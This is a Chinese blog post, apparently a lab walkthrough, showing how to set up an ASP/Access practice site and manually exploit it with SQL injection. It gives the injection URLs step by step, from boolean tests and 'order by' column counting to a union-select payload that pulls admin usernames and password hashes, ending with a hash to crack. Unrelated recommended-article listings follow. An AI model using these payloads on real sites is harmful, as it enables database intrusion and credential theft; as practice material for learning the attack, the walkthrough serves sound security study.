ASSESS手工注入(附搭建教程)

已于 2024-08-20 12:36:24 修改
阅读量719 收藏 5
点赞数 21
文章标签: 服务器 运维
于 2024-08-20 12:01:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75036923/article/details/141353111
版权

ASSESS搭建

文章顶部有靶场搭建环境

1.将环境压缩包放入wwwroot更目录下

 2.进入网页访问自己IP就可以访问到自己搭建的靶场了  如下图所示 

 ASSESS手工注入

一.判断注入点

http://172.16.1.49/custom.asp?id=1 and 1=1icon-default.png?t=N7T8http://172.16.1.49/custom.asp?id=1%20and%201=1

页面显示正常

http://172.16.1.49/custom.asp?id=1 and 1=2icon-default.png?t=N7T8http://172.16.1.49/custom.asp?id=1%20and%201=2

页面报错

 二.判断当前数据库的字段文件...其到达5时页面置空,说明语句执行失败,当前数据库的字段仅有4列~

http://custom.asp?id=1 order by 4

http://custom.asp?id=1 order by 5icon-default.png?t=N7T8http://custom.asp?id=1%20order%20by%205

 三.判断回显的字段及猜测表名称...在2与3位置可发现存在字段回显.

四.猜字段名 

http://custom.asp?id=1 union select 1,user_name,password,4 from administratoricon-default.png?t=N7T8http://custom.asp?id=1%20union%20select%201,user_name,password,4%20from%20administrator

五.将获取到的密码解密21232f297a57a5a743894a0e4a801fc3

一身傲骨@
关注
Sqlmap速查表/功能移植/Python批量检测SQL注入
浪子燕青的博客
03-11 1504
title: Sqlmap速查表与Python进行功能移植 copyright: true top: 0 date: 2021-02-27 11:59:00 tags: [扫描注入,注入,sqlmap] categories: 安全开发 permalink: password: keywords: description: Sqlmap速查,对其WAF识别功能移植,对其Sql注入的payload进行移植,完成Python批量检测SQL注入。 今天的剑桥对我而言只是一百年前那个剑桥的幻影,但我还会不由自主.
Jboss EJB3.0实例教程
林踪翼影的专栏
03-08 2598
Jboss EJB3.0实例教程 第一章 前言........................................................................................................................................................................5 1.1
【爬虫】利用Python爬虫爬取小麦苗itpub博客的所有文章的连接地址(1)
小麦苗DBA宝典
12-26 2459
【爬虫】利用Python爬虫爬取小麦苗itpub博客的所有文章的连接地址(1) 爬取结果: 火狐(Firefox)如何移除addsec...
Jboss EJB3.0 实例教程
st_linxiaoling的专栏
09-25 2724
了解Jboss配置以及如何发布EJB
ubuntu16.04+python+anaconda+tensorflow的深度学习1
guosuling的博客
01-10 626
目录 1、可视化Tensorflow 2、TensorFlow 基础知识 2.1 数据流图简介 2.1.1 数据流图基础 2.1.2 节点的依赖关系 2.2 在TensorFlow中定义数据流图 2.2.1 构建第一个Tensorflow 数据流图        writer = tf.summary.FileWriter('./my_graph', sess.graph) 2....
python人工智能原理、实践及应用课后习题
weixin_42831564的博客
04-04 2687
人工智能是能够感知、推理、行动和适应的程序。人工智能的意义和目标是解放人类劳动,使机器能向人一样思考或劳动。课程标准答案人工智能(Artificial Intelligence),英文缩写为AI。它是研究、开发用于模拟、延伸和扩展人的智能的理论、方法、技术及应用系统的一门新的技术科学。人工智能是计算机科学的一个分支,它企图了解智能的实质,并生产出一种新的能以人类智能相似的方式作出反应的智能机器,该领域的研究包括机器人、语言识别、图像识别、自然语言处理和专家系统等。
一个简单的springboot项目(有源码)
Saniana的博客
08-24 1091
开发一个springboot项目代码迭代整合工具 gitee建模意义程序处理方式开发功能的步骤web服务网络状态码web应用的开发分层springboot的作用springboot框架搭建框架中各组件作用框架的演变如何提取hive中的表结构创建springboot 工程的引导模版 要选择aliyun ,否则不支持java8springboot 工程spring 相关组件代码生成器动态数据源整合druid连接池具体代码:代码说明:Controller层注解 说明小练习Redis(代码)5大数据类型 场景自测
一面基本问题
m0_61980779的博客
09-01 2080
OWASP TOP10,应急
Karma自动化测试
Mr古技术分享
12-01 1759
Karma自动化测试什么时候启用自动化测试?项目开发到后期,版本相对稳定,需要进行反复测试的情况下可以考虑启用自动化测试,但不能完全替代手工测试,自动化测试仅是减去测试人员反复测试的工作量.Angularjs测试环境搭建 安装node.js 安装karma(在软件根目录安装) npm install -g karma npm install karma-qunit --save-dev npm
Arp Assess-开源
04-27
标题中的“Arp Assess-开源”指的是一个名为Arp Assess的开源项目,它专注于在网络环境中监控和记录ARP(地址解析协议)流量。ARP是IPv4网络中的一种关键协议,用于将IP地址映射到MAC(媒体访问控制)地址,从而确保...
西门子PC Assess
03-21
西门子PC Assess是一款专为西门子S7-200系列PLC(可编程逻辑控制器)设计的通信工具,它与WinCC(西门子的Human Machine Interface,即人机界面)系统配合,实现了高效的数据交互和监控功能。在工业自动化领域,这种...
THR2104 - Assess your Microsoft Azure security like a pro.pptx
09-11
THR2104 - Assess your Microsoft Azure security like a pro.pptx
Paper_Track4_A Heuristic Approach to Assess Anisotropic.pdf
08-06
Paper_Track4_A Heuristic Approach to Assess Anisotropic_SimonovichFinal_Nov8-2023
统信服务器操作系统【Cron定时任务服务】
RZer的博客
09-23 1238
Cron定时任务服务服务介绍、服务管理、服务配置
awk 切割字符串 shell linux
abc
09-24 308
shell linux awk 切割字符串。
服务器操作系统【sar 命令】
RZer的博客
09-23 1167
sar 安装、语法参数说明以及示例
FTP 服务器 linux安装
最新发布
weixin_45368812的博客
09-25 1000
ftp 连接失败:500 OOPS: vsftpd: refusing to run with writable root inside chroot()ftp 连接失败:530 permission deniedftp 连接成功,但是能访问到上级目录和其他目录提示:以下是本篇文章正文内容,下面案例可供参考注意: 以下全部操作都是基于 SELinux= disable、防火墙关闭。
with tf.Session() as sess :
04-24
在TensorFlow中,使用`with tf.Session() as sess:`语句可以创建一个会话,并在会话中执行操作。这种写法可以确保在会话结束后自动关闭会话,释放资源。下面是一个示例代码[^2]: ```python import tensorflow as ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值